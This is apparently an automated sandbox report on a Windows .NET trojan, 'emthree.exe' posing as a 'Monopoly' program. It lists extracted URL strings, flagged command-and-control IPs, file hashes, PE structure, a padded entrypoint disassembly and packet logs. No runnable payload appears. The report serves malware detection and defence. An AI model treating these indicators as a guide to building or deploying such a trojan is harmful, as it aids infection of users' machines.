                      http://www.fontbureau.comemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersGemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designers/?emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                            		high
                            http://www.founder.com.cn/cn/bTheemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers?emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                              		high
                              http://www.tiro.comexplorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                		high
                                http://www.goodfont.co.kremthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.carterandcone.comlemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/cabarga.htmlNemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cnemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/frere-jones.htmlemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.fontbureau.commemthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleaseemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers8emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fonts.comemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.kremthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.comuemthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameemthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.sakkal.comemthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          23.27.109.19
                                          		unknownUnited States
                                          		18779EGIHOSTINGUStrue
                                          184.154.50.243
                                          		unknownUnited States
                                          		32475SINGLEHOP-LLCUStrue

                                          Private

                                          IP
                                          192.168.2.1

                                          General Information

                                          Joe Sandbox Version:31.0.0 Red Diamond
                                          Analysis ID:323574
                                          Start date:27.11.2020
                                          Start time:06:35:16
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 6s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:emthree.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:26
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/1@4/3
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 19.8% (good quality ratio 18%)
                                          • Quality average: 73.7%
                                          • Quality standard deviation: 30.5%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 2.20.84.85, 52.155.217.156, 20.54.26.129, 40.67.254.36, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194, 204.79.197.200, 13.107.21.200
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323574/sample/emthree.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          06:36:09API Interceptor15x Sleep call for process: emthree.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          SINGLEHOP-LLCUSdocument-1514127389.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1514127389.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1561665791.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1597193979.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1561665791.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1502756172.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1502756172.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1593420450.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1526904949.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1593420450.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1526904949.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1560775643.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1560775643.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-162270445.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-162270445.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1490556011.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1490556011.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1469700244.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1469700244.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          document-1511476.xlsGet hashmaliciousBrowse
                                          • 67.212.179.162
                                          EGIHOSTINGUSPI202009255687.xlsxGet hashmaliciousBrowse
                                          • 104.164.99.242
                                          VOMAXTRADING.docGet hashmaliciousBrowse
                                          • 50.117.11.156
                                          inv.exeGet hashmaliciousBrowse
                                          • 104.164.35.80
                                          2020112395387_pdf.exeGet hashmaliciousBrowse
                                          • 104.164.99.242
                                          EME_PO.39134.xlsxGet hashmaliciousBrowse
                                          • 104.164.26.233
                                          new quotation order.exeGet hashmaliciousBrowse
                                          • 104.252.31.62
                                          POGWEAP.xlsxGet hashmaliciousBrowse
                                          • 172.120.44.167
                                          oqTdpbN5rF.exeGet hashmaliciousBrowse
                                          • 104.252.192.7
                                          Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                          • 104.253.79.71
                                          Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                          • 104.164.52.200
                                          INQUIRY.exeGet hashmaliciousBrowse
                                          • 45.39.88.85
                                          Invoice.exeGet hashmaliciousBrowse
                                          • 45.39.153.189
                                          new file.exe.exeGet hashmaliciousBrowse
                                          • 136.0.180.203
                                          hjKM0s7CWW.exeGet hashmaliciousBrowse
                                          • 172.121.57.222
                                          9Ul8m9FQ47.exeGet hashmaliciousBrowse
                                          • 107.164.194.74
                                          n4uladudJS.exeGet hashmaliciousBrowse
                                          • 107.164.194.74
                                          qkN4OZWFG6.exeGet hashmaliciousBrowse
                                          • 50.117.84.157
                                          kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                          • 50.117.84.157
                                          NzI1oP5E74.exeGet hashmaliciousBrowse
                                          • 172.121.57.222
                                          jtFF5EQoEE.exeGet hashmaliciousBrowse
                                          • 142.252.135.158

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log
                                          Process:C:\Users\user\Desktop\emthree.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.345637324625647
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                          MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                          SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                          SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                          SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.696882160461213
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:emthree.exe
                                          File size:459776
                                          MD5:25b5788669a3a8f35596ce975f0823a7
                                          SHA1:77e07883f131f342e3d24954ea348d25554440a1
                                          SHA256:f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
                                          SHA512:53f7273b1d20ec613cb1bcb0c4a30272c90f8585515be013f52be236e9cccc4457b2fab52b9649092807f4de9ab9da21a11d63897c0ed8e9fff02eebefaf1f03
                                          SSDEEP:12288:YK8UvYOUgUihAbxk6nVTBWOfK/Kl3+XXt8LF:YK8Uv2dbvT0OfKClid8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f................0.............f.... ... ....@.. .......................`............@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x471966
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x719140x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x720000x594.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x718f80x1c.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x6f96c0x6fa00False0.841486299692data7.70662287757IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc0x720000x5940x600False0.415364583333data4.06023267139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x740000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_VERSION0x720900x304data
                                          RT_MANIFEST0x723a40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Version Infos

                                          DescriptionData
                                          Translation0x0000 0x04b0
                                          LegalCopyrightCopyright 2019
                                          Assembly Version1.0.0.0
                                          InternalName.exe
                                          FileVersion1.0.0.0
                                          CompanyName
                                          LegalTrademarks
                                          Comments
                                          ProductNameMonopoly
                                          ProductVersion1.0.0.0
                                          FileDescriptionMonopoly
                                          OriginalFilename.exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 27, 2020 06:37:46.503295898 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:46.628735065 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:46.628865004 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:46.629072905 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:46.754323959 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:47.128029108 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:47.292691946 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.018973112 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019009113 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019030094 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019047976 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019066095 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019074917 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019092083 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019104004 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019130945 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019155025 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019174099 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019191980 CET8049746184.154.50.243192.168.2.5
                                          Nov 27, 2020 06:37:48.019215107 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019238949 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019243002 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019247055 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:37:48.019258976 CET4974680192.168.2.5184.154.50.243
                                          Nov 27, 2020 06:38:07.723004103 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:07.894550085 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:07.894740105 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:07.894825935 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:08.068506002 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:08.068561077 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:08.068598032 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:08.068630934 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:08.068656921 CET804974723.27.109.19192.168.2.5
                                          Nov 27, 2020 06:38:08.068849087 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:08.068891048 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:08.068949938 CET4974780192.168.2.523.27.109.19
                                          Nov 27, 2020 06:38:08.068964958 CET4974780192.168.2.523.27.109.19

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 27, 2020 06:35:59.423458099 CET5475753192.168.2.58.8.8.8
                                          Nov 27, 2020 06:35:59.450866938 CET53547578.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:00.254846096 CET4999253192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:00.282181025 CET53499928.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:22.684704065 CET6007553192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:22.711971998 CET53600758.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:23.952682018 CET5501653192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:23.997966051 CET53550168.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:44.839894056 CET6434553192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:44.875737906 CET53643458.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:45.319561005 CET5712853192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:45.355184078 CET53571288.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:45.782104969 CET5479153192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:45.809331894 CET53547918.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:46.375197887 CET5046353192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:46.410703897 CET53504638.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:46.524899006 CET5039453192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:46.562680960 CET53503948.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:46.857793093 CET5853053192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:46.893222094 CET53585308.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:47.262835979 CET5381353192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:47.298357010 CET53538138.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:47.721534014 CET6373253192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:47.759166002 CET53637328.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:48.233823061 CET5734453192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:48.270900011 CET53573448.8.8.8192.168.2.5
                                          Nov 27, 2020 06:36:48.312632084 CET5445053192.168.2.58.8.8.8
                                          Nov 27, 2020 06:36:48.349679947 CET53544508.8.8.8192.168.2.5
